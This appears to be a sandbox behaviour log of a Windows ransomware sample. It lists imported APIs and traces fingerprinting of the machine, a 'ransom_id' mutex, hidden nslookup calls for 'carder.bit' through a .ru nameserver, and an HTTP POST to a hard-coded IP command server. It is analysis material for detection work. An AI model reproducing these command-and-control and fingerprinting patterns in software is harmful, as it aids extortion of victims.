Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x76ead423 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x76e94220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776e45f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76e92d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x76e94173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76e9103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x76ea195c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76eb2b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76e9192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x76f1415b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76eb8baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x76eb896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76eb735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x776d2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76e91410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x76e94435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x76e91b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x76e95929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x76ea9af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76e94442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76e954ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x76ead4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76ea10b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x76e9dd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x76e97a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x76e943e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x76eac860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76e949d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x76e95063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76e91986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x776e2c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76e91136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x777292b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76e9418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x76eb828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76e95235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x76ead5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x76e91909 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76e91700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x7770d598 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76e93f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76e94950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76e91282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76e934b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x76e91826 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x76e918f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x76e9196e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x76e91b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76eb2a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76e91245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76e91856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76e91222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76e914e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76e914c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x76e9424c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76eb3102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76e911c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76eac807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76e9168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x76e95558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x76ead4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MulDiv, address_out = 0x76e91b80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76e9588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76e9110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76e93ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x76e93e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76e9186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x76eaf7aa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76e934d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76e91809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x776de026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76e95a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x776d22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76e97a10 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextW, address_out = 0x75a125cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextA, address_out = 0x75a1aea1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x75a072c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x75a07446 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75a11341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75a09a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x75a078e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x75a088f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75a11361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FillRect, address_out = 0x75a10eb6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75a07809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x75a0b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x75a08332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x75a5fd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x75a1ae5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x75a090d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75a10dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75a08a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75a09679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x75a0787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776e25dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75a13559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x75a12320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x75a0fc5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x75a2e061 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x75a0b142 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76b00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76b15689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76b14f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x76b154f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76b15f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetPixel, address_out = 0x76b1ccee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetObjectW, address_out = 0x76b16c3a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetPixel, address_out = 0x76b1cbfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetStockObject, address_out = 0x76b14eb8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x76b1d41c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetBkColor, address_out = 0x76b152d8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x76b16001 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76b14de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x76b158b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateFontW, address_out = 0x76b1b600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetTextColor, address_out = 0x76b1522d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77050000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x770640fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7706469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x770614d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77064304 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77060e24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77060e0c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7706431c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x770591ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7705df14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x770777cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7705e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7705c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7707779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x77058ee9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7705c51a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x770646ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7706468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x770640e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7706412e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x7706157a True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x75e20468 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75e13c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e21e46 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x757ca8c5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x757c5d77 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75d00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75d1ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x75d24fae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x75d2ba12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x75d2492c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x75d24a42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x75d29197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75d1b406 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x77680000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x776814cc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x77681514 True 1
Fn
Thread 0x7d4
89 35
»
Category Operation Information Success Count Logfile
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Fn
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=8a13d26b705ba84c True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Fn
System Get Time type = Ticks, time = 12495 True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Inet Read Response size = 10238, size_out = 14 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 256 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, type = size True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 238601, size_out = 238601 True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0x418, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 306 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 87.97.250.231, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = steiphai?deere=ayssey&iezaer=seyst, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 87.97.250.231/steiphai?deere=ayssey&iezaer=seyst True 1
Fn
Data
Inet Read Response size = 204798, size_out = 552 True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 20326 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
System Get Time type = Ticks, time = 21434 True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x776b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x7776ffc1 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0x5e8, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 308 True 1
Fn
Data
Inet Close Session - True 1
Fn
